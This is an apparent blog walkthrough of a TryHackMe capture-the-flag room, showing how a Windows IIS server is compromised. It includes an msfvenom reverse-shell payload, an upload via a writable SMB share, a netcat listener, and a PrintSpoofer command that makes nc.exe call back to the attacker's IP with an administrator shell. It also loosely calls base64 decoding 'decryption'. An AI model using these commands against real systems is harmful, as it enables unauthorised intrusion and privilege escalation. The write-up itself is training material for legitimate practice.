How I Hacked a Win Server Using Printspoofer
CHALLENGE OVERVIEW
- Link: https://tryhackme.com/room/relevant
- Difficulty: Medium
- Target: User/root flags
- Highlight: Using
printspoofer
to privilege escalate to the admin account - Tools used:
nmap
,dirb
,smbmap
,base64
,msfvenom
,netcat
- Tags: Security, Security Misconfiguration, Pentest, blackbox, pentest
BACKGROUND

This is another blackbox-style CTF challenge.
👉 Recommended: TryHackMe Daily Bugle Made Easy – A Helpful Walkthrough with Hacking Video
We go into the pentest without any prior knowledge of our target. We are only provided the IP address and will need to do our own enumeration to learn more about our target, and then we’ll move on to planning and executing our attack.
ENUMERATION/RECON

Here are some of the most notable results from our initial enumeration scans.
Nmap results:

It is curious that there are two open ports running HTTP servers. We would be wise to follow up on this finding with dirb
scans on both ports to check for hidden directories.
The name Relevant also pops up on port 3389. This may be important, considering the name of this challenge.
Smbmap
Using smbmap
we are able to extract four shares and information about permissions.

We’ll proceed by logging into the nt4wrksv
share because it has read and write permissions and may not be password protected.

We found a passwords.txt
file here that holds two encrypted strings. Let’s try using base64
to decrypt these strings.
We can use the command:
echo "<encoded string>" | base64 -d
We have decrypted two password:username
combos from these strings. These may come in handy later on in our hack.
Another interesting finding is that the smbshare
at //10.10.5.113/nt4wrksv
is directly connected to the smb
share with which we have write access privileges. This means that we can use this to throw a reverse shell.
We’ll use the rev.aspx
file that I previously created with msfvenom
.
We are choosing aspx
for the format because we know that our server is running on Microsoft IIs httpd
, and aspx
files are built to run on this kind of server.
You can build your own rev.aspx
for spawning a reverse windows shell with the following command:
msfvenom -p windows/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
UPLOAD THE REV.ASPX PAYLOAD

After uploading the rev.aspx
payload via the smbclient
at //<targetIP>/nt4wrksv
using the command put <filename>
, we’ll set up a netcat
listener:
nc -lnvp 3333
We can trigger the revshell
now by loading in our browser:
http://<targetIP>/nt4wrksv/rev.aspx
And now we have our initial foothold!
Next, let’s do an Nmap –script vuln scan to drill in on more details about potential vulnerabilities on the target machine.


Our nmap
script vuln scan turns up ms17-010
indicating a vulnerability to the famous Eternal Blue exploit on our target machine.
INITIAL FOOTHOLD

Running whoami /priv
reveals SeImpersonatePrivilege
is enabled. Let’s keep this in mind as a possible plan B for our attack vector. We might be able to use the printspoofer
exploit.

LOCAL RECON
c:\Users\Bob\Desktop>type user.txt type user.txt THM{fd—--------omitted—-------------45}
PRIVILEGE ESCALATION

Our nmap –script vuln scan revealed a vulnerability to Eternal blue (ms17-010).
I tried setting up the Python script from exploit-db and wasn’t successful. If this was a real pentest, I would definitely do further investigation into the exploit and try using the metasploit eternal blue module. For now, let’s go to plan B – the printspoofer exploit.
PLAN B – USING PRINTSPOOFER TO GAIN ADMINISTRATIVE AUTHORITY
👉 Link: https://github.com/itm4n/PrintSpoofer
.\PrintSpoofer.exe -c ".\nc.exe 10.6.2.23 3333 -e cmd"
And now we are the Administrator!
POST-EXPLOITATION
Let’s grab the root flag from the usual directory.

FINAL THOUGHTS

There are probably several ways to solve this box, but this is the one that seemed most natural to me.
Some information we learned during enumeration ended up being irrelevant to our attack vector. I guess the lesson here is to look for viable ways forward and not to dwell for too long on extra information, such as the encrypted passwords or the eternal blue vulnerability that didn’t seem to work for privilege escalation.
Again, the simpler solution proved to be the better solution.

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.